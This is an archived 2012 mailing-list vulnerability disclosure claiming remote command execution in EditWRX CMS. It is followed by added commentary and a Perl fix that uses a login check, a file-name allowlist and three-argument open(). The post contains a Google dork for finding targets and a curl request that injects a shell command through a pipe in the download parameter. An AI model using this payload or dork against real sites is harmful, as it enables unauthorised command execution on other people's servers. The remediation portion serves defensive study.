Message-Id: <E1Rwbuu-0007rs-NI@max5.hosteur.com>
Date: Sun, 12 Feb 2012 17:04:44 +0100
From: chippy@...ania.gov.ro
To: full-disclosure@...ts.grok.org.uk
Subject: EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
VULN_____________________________________________________________
EditWRX CMS Remote Code Execution + Admin Bypass Zero Day
NFO______________________________________________________________
EditWRX is vulnerable to remote code execution through mishandling
of open() in the downloader, which can read in piped commands.
Despite the downloader being an administrative component, a login
is not required to call the function, and therefore no access is
required to exploit this vulnerability.
ZDAY_____________________________________________________________
Google: inurl:editwrx/wrx.cgi
RXE: curl http://example.com/editwrx/wrx.cgi?download=;uname%20-a|
Found by: chippy1337
GREETZ___________________________________________________________
Robert Cavanaugh
Ryan Cleary
Jasper Lingers
Carlos1337 (dos cero dia!)
MASTER HACKER
FLOOD HACKER
DR TIGER
WANG HACKER
DDOS KING
Sabu, Havij Professional
D0xbin
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
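
The advisory above names two root causes: request data reaching open() in a form that accepts pipes, and an administrative function that can be called without a login. The handler below is an added example, not EditWRX code (the post does not show the source), of a downloader that closes both. It assumes the CGI is written in Perl, whose two-argument open() behaves as described; the directory, the function names and the `$is_admin` flag are hypothetical.

```perl
#!/usr/bin/perl
# Added example, not EditWRX source. All names here are hypothetical.
use strict;
use warnings;
use File::Spec;

my $DOWNLOAD_DIR = '/var/www/editwrx/files';   # assumed location

# The unsafe pattern is two-argument open on request data:
#     open(FH, $name);
# Perl takes the open mode from the string itself, so a leading or
# trailing "|" makes it run the string as a command instead of opening
# a file.

sub safe_download_path {
    my ($name) = @_;
    return unless defined $name;
    # Allowlist: a bare file name, no path separators, pipes or spaces.
    return unless $name =~ /\A[A-Za-z0-9_][A-Za-z0-9_.-]{0,127}\z/;
    return File::Spec->catfile($DOWNLOAD_DIR, $name);
}

sub handle_download {
    my ($name, $is_admin) = @_;
    # Fix for the missing login check: refuse before touching the input.
    return (403, 'login required') unless $is_admin;
    my $path = safe_download_path($name)
        or return (400, 'bad file name');
    # Fix for the open() mishandling: three-argument open with an
    # explicit '<' mode treats $path strictly as a file name.
    open(my $fh, '<', $path) or return (404, 'not found');
    binmode $fh;
    local $/;                      # slurp the whole file
    my $data = <$fh>;
    close $fh;
    return (200, $data);
}

# Constructed inputs: a normal file name and one ending in a pipe.
for my $name ('report.txt', 'x|') {
    my ($status) = handle_download($name, 1);
    print "$name -> $status\n";
}
my ($status) = handle_download('report.txt', 0);
print "unauthenticated -> $status\n";
```

The allowlist and the three-argument open are independent controls: either one alone stops a pipe character from reaching the shell, and keeping both means a later change to one does not reopen the hole.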